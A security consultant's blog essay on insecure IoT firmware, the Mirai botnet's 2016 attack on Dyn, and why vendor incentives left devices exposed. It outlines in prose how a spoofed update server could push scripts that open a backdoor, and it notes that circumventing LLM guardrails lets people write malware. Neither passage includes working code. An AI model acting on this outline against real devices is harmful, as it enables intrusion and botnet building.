Connected Everything, Secured Nothing
In October 2016, the Mirai botnet took down Dyn, and with it, half the internet. Twitter, Netflix, Reddit, GitHub - all offline because someone figured out that IoT devices ship with default credentials and no one changes them.
I'd been warning about this since 2013. I'd been in serious infrastructure for over a decade by then.
IoT firmware — the software running on these devices — was shockingly poorly written: provisioning that relied on unsanitised variables executed as root via bash scripts, insecure ports wide open, no OTA update mechanisms, baked-in credentials — or ones that were easily guessed if you knew what to look for and how they were generated — debug interfaces left enabled, telnet exposed to the internet, and firmware a child could dump and rip apart.
Don't worry if that didn't make sense — let me explain one of the easiest ones to exploit.
What I Said and What I Was Seeing
One of the easiest routes didn't even require touching the device. By their connected nature, most communication with these devices was pull-based — the device called "home" to the manufacturer's servers over the internet. The problem? They frequently never bothered to check that the server they were calling home to was actually their company's server. They'd call out to something like https://update.domain.com — notice the 's' after the 'http', it's ubiquitous now — the Snowden revelations had just landed in 2013, the world was waking up to surveillance, and yet these devices weren't even checking who they were talking to.
The device didn't always verify the certificate — if they'd even enabled TLS. Yes, that's right: some endpoints weren't even running TLS by default. Your device was talking over the internet with no security at all. So if I could sit at the DNS level — on a compromised router, or by sticking a cable between the device and the internet — I could pretend to be the update server.
For the non-technical: curl -k or curl --insecure is a flag developers baked into the firmware of those tiny "smart" devices sitting in your home — it tells the device to skip TLS certificate verification entirely. It means "connect to anything that claims to be the server, even if you can't verify it." It's the digital equivalent of handing your house keys to anyone showing up at your front door in a delivery uniform — only the delivery driver is invisible, and you never saw them enter your house.
Now imagine you're the vendor. You have thousands of these devices deployed. It would be game over if you somehow pushed out a config that caused them to fail or misbehave — you needed a way to recover, because sending out engineers just wouldn't be possible, and asking clients to debug a device will kill your brand overnight.
So some vendors would have an API endpoint that returned a script to be run, mostly for diagnostics, or allowed arbitrary commands to be executed, or even just a simple call to pull CPU usage.
Here's the fun bit: if I could be that update server and push my own scripts down to the device, append my own inline command to the end of the request, the "smart" device would happily go and execute them — so much for being smart. Game over. I've just pushed a script to open a remote backdoor calling back to my servers, and this is how you get your own botnet. Now imagine that at scale.
I was finding this in production firmware in 2013. I'd been finding it in devices back in 2008. Devices that were meant to be secure, with "SSL encryption" (technically TLS, but let's not split hairs) in the marketing materials, happily connecting to any man-in-the-middle who bothered to intercept them.
The talk title wasn't subtle. IoT was rushing toward cloud connectivity without any serious security architecture. The devices were a tinderbox. The clouds they connected to were the matches. The whole thing was waiting for a spark.
This was my job. Finding holes in IoT products before they shipped, or more often, after they'd already shipped. The reaction was usually somewhere between denial and panic, with a brief stop at "can we just not tell anyone?"
Filippo Valsorda is a proper cryptographer. When he tweeted about TLS issues, I chimed in with the IoT angle. The example code that developers copied into their projects was teaching them to disable security by default. The rot started in the tutorials.
This wasn't obscure. Anyone doing IoT security work was seeing the same things. We were all writing the same reports, giving the same talks, being ignored in the same ways.
Why Nobody Listened
Time to market. Security takes time. Adding proper certificate handling, credential management, update mechanisms - all of this slows down shipping. The competitive pressure was to ship first, worry about security never.
No liability. When an IoT device gets compromised and joins a botnet, who pays? Not the manufacturer. Not the retailer. The cost is externalised to everyone who gets DDoS'd. No incentive to fix it.
Invisible until it isn't. Security is intangible. Features sell. "Unhackable" is hard to demonstrate in a trade show booth. "Voice control" is easy.
Developer inexperience. The people building IoT devices were often hardware engineers learning software, or embedded developers who'd never dealt with networked threats. They didn't know what they didn't know.
I was in the room with these people. I wasn't unsympathetic. At one talk, there were a good 150 developers in the audience whose job this was, part of a larger crowd who worked in the industry. I asked them to raise their hands and keep them up as the questions got harder. By the time I asked who understood what --insecure actually did at the end of a curl command, half a dozen hands were left. The pressures they were under were real. But the vulnerabilities they were shipping were also real.
Then Mirai Happened
October 2016. The Mirai botnet, built from compromised IoT devices - cameras, DVRs, routers - launched a DDoS attack against Dyn's DNS infrastructure. Half the internet went dark. At its peak, Mirai had enslaved an estimated 600,000 devices. The attack came in waves, lasting most of the day, and Dyn's engineers were fighting it in real time with no playbook — because nobody had ever seen a botnet this size built entirely from IoT devices.
The devices weren't hacked through sophisticated exploits. Mirai just tried default credentials. It worked on hundreds of thousands of devices because millions shipped with default credentials that no one changed.
Everything I'd been warning about for three years, demonstrated at scale, in a way that was impossible to ignore.
What Changed (And What Didn't)
After Mirai, IoT security got briefly fashionable. Conferences wanted talks. Journalists wanted quotes. Regulators started making noises.
Some things improved. The UK's PSTI Act finally came into force in April 2024 — over seven years after Mirai — making it illegal to ship devices with default passwords like "admin" or "12345." Every device now needs a unique password or must force a change on first use. It only took Mirai to get there.
But the fundamental incentives haven't changed. Time to market still beats security. Liability is still externalised. The cheapest device still wins on Amazon. The race to the bottom continues, just with slightly better optics.
The next Mirai-scale event is a matter of when, not if. The attack surface keeps growing. The defenders haven't fundamentally changed the game.
And the game has changed again. AI has handed every script kiddie a force multiplier. Anyone who can circumvent an LLM's guardrails can bang out pretty sophisticated malware in an afternoon. The barrier to entry for writing exploits just collapsed. The devices haven't got any smarter, but the attackers have. And there are more devices than ever — every RP2040 in a keyboard, every smart plug, every camera on a shelf in Argos.
The Lesson
Being early on a correct observation doesn't mean you can change the outcome. I was right about IoT security in 2013. Everyone doing security work was right. We were all giving the same warnings.
The warnings didn't prevent Mirai. They didn't prevent the dozens of IoT botnets that came after. They might have influenced the margins - some companies shipped slightly better products because someone in the room had heard a talk once.
But the systemic issues required systemic solutions. Regulation, liability reform, market pressure. None of those materialised in time.
I still think it was worth doing. Documenting the problems publicly, with timestamps, means there's a record.
But I should be honest about my own limitations here too. I was warning about IoT security while still working with companies that shipped products with known compromises because the timeline demanded it. I understood the pressures. I made recommendations that got overruled by commercial reality. Sometimes I didn't push hard enough.
Being right about the problem doesn't mean I solved it. That's worth remembering.
Worried about the security posture of your product or infrastructure? I can help with that.
This article is part of The Long View — spotting signals and patterns before they're obvious.